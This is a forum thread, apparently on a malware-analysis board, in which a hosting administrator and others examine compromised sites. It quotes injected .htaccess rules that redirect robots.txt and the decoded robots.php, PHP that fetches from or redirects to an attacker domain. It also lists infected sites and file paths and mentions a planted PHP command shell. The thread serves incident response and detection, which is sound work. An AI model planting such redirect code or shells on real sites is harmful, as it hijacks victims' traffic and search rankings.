robots.txt redirects to svainefler.info

[foks]

I work on a pretty large web hosting company. Some days ago a lot of FTP accounts got attacked.

In .htaccess these rows where added:
RewriteEngine Off
RewriteEngine On
RewriteBase /
RewriteRule robots\.txt$ includ2e/robots.php [R=301,L]

Robots.php has base64-encoded data, which translates into this:
$fid = '4506';

$gto="http://get.svainefler.info/g-f/?asd=".$fid."&url=".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$res=file_get_contents($gto);                                                         
if (!$res) header ("Location: ".$gto);else  echo "Redirecting...";

One more file is uploaded, this file simply runs any php commands you post to the file.

http://get.svainefler.info/g-f/ gives "Account closed" but that might be because I try with the wrong user agent.

Does anyone know the purpose of this attack? As far as I know robots.txt can only be used to block pages from being indexed.

[SysAdMini]

Would you please post Robots.php and the other file in a password protected zip file ?

What is the location of the other file ?

[foks]

Zip file password: 123456
I have added all files that were uploaded.

[philipp]

Now that is interesting.

The following subdomains resolve, svainefler.info doesnt:
get.svainefler.info
5716.svainefler.info
my.svainefler.info

I could not find anything interesting there, except of

Code: [Select]

403 http://get.svainefler.info/1/
but that doesnt help much

Code: [Select]

Domain: svainefler.info
 Reg: contact@privacyprotect.org
IP: 111.221.47.137
 RDNS:
 ASN: 24312 (SG)

According to a quick google search the following websites are infected:

Code: [Select]

http://www.ligaloto.com/includ2e/robots.php
http://www.horsez.be/
http://www.jotya.com/
http://www.achatmaroc.com/
http://www.josef-neuhauser.at/includ2e/robots.php
http://www.budgettyres.plus.com/
http://www.dsquared.com/includ2e/robots.php
http://users.telenet.be/stippi/

with the following path/file combinations seen:

Code: [Select]

/includ2e/14mg.php
/includ2e/c7ss.php
/includ2e/robots.php
/includ2e/sty6le.php
/includ2e/temp9lates.php
/includ2e/us8ers.php

/2wu/1nc.php
/2wu/robots.php

/5pf/1mg.php
/5pf/robots.php

/7a/_cache.php
/7a/robots.php

/pw/media_.php
/pw/robots.php

/yzs18yzy7/c1ass.php
/yzs18yzy7/robots.php

On a side note (probably irrelevant here):
Koobface

Code: [Select]

http://www.achatmaroc.com/.sys/
http://www.jotya.com/.sys/


[foks]

On a side note (probably irrelevant here):
Koobface

Code: [Select]

http://www.achatmaroc.com/.sys/
http://www.jotya.com/.sys/


Yeah, some of the accounts I found had been infected by Koobface since March but for some reason these Koobface pages were never accessed.

[Kimberly]

You might need the full URL + params to get content

Code: [Select]

http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html

[SysAdMini]

You might need the full URL + params to get content

Code: [Select]

http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html

I think you need a php useragent too.

[foks]

You might need the full URL + params to get content

Code: [Select]

http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html

I think you need a php useragent too.

PHPs useragent is empty by default (http://www.electrictoolbox.com/php-change-user-agent-string/), I tried with:
wget -U "" "http://get.svainefler.info/g-f/?asd=4506&url=http://www.jotya.com/yzs18yzy7/robots.php"
but the only result is:
Account closed

I also checked with an url where I know that 4506 is the asd number the url use.

[MysteryFCM]

Only taken a quick look so far but;

Code: [Select]

http://www.jotya.com/.sys/dat/
.sys confirms Koobface.

[RichardW]

This looks like a 2 part attack.  robots.txt by its very nature is publicly available, and accessed A LOT by crawlers.  The robots.php includes a flag.  If the script can't execute, it at least poisons the site's referral stats (unsuspecting webmaster can click on this), and if it can execute, its possibly poisoning the search engine results due to the use of a 301 Permanent redirect.

You see that in the robots.php they're executing/decoding on the fly due to the use of echo(base64_decode()).  I'm sure this is obfuscating against ids inspection.  But that's okay, now we can just look for the use of base64_decode in robots.*   

[MysteryFCM]

Welcome to MDL